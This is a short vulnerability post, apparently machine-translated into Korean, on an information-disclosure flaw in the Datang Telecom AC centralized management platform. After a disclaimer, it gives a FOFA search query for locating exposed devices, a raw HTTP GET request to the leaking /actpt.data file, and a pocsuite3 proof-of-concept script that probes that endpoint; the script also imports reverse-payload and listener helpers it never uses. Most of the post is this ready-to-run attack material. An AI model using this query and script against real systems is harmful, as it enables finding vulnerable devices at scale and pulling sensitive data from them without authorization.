부인 성명
글에 관련된 취약점은 수정되었으며 민감한 정보는 코딩되었습니다. 이 글은 경험 공유를 위한 글입니다 . 심각하게 받아들이지 마세요. 무단 공격은 불법입니다! 기사의 민감한 정보는 여러 수준에서 처리되었습니다. 본 글에 게재된 정보의 유포 및 이용으로 인해 발생한 직·간접적인 결과 및 손실에 대한 책임은 이용자에게 있으며, 이에 대해 작성자는 어떠한 책임도 지지 아니하므로, 결과에 대한 책임은 이용자에게 있습니다.
취약점 설명
Datang Telecom AC 중앙 집중식 관리 플랫폼에는 민감한 정보 유출 취약성이 있습니다.
포파 성명서
app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ=="POC 플러스 감지
GET /actpt.data HTTP/1.1
Host:
Referer: http://122.227.210.230:800/relogin.htm
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
PoC 스크립트
스크립트를 위한 Pocsuite 프레임워크
# _*_ coding:utf-8 _*_
# @Time : 2023/12/22
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
class datang_dianxinAC_information_leakage(POCBase):
pocDesc = '''大唐电信AC集中管理平台敏感信息泄漏漏洞'''
author = '炼金术师诸葛亮'
createDate = '2023-12-22'
name = '大唐电信AC集中管理平台敏感信息泄漏漏洞'
def _verify(self):
result = {}
url = self.url+ '/actpt.data'
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'Keep-Alive',
'Pragma': 'no-cache',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'no-cache'
}
try:
response = requests.get(url, headers=headers)
if response.status_code == 200 and 'id' in response.text:
result['VerifyInfo'] = {}
return self.parse_output(result)
except Exception as e:
pass
register_poc(datang_dianxinAC_information_leakage)스크립트 악용
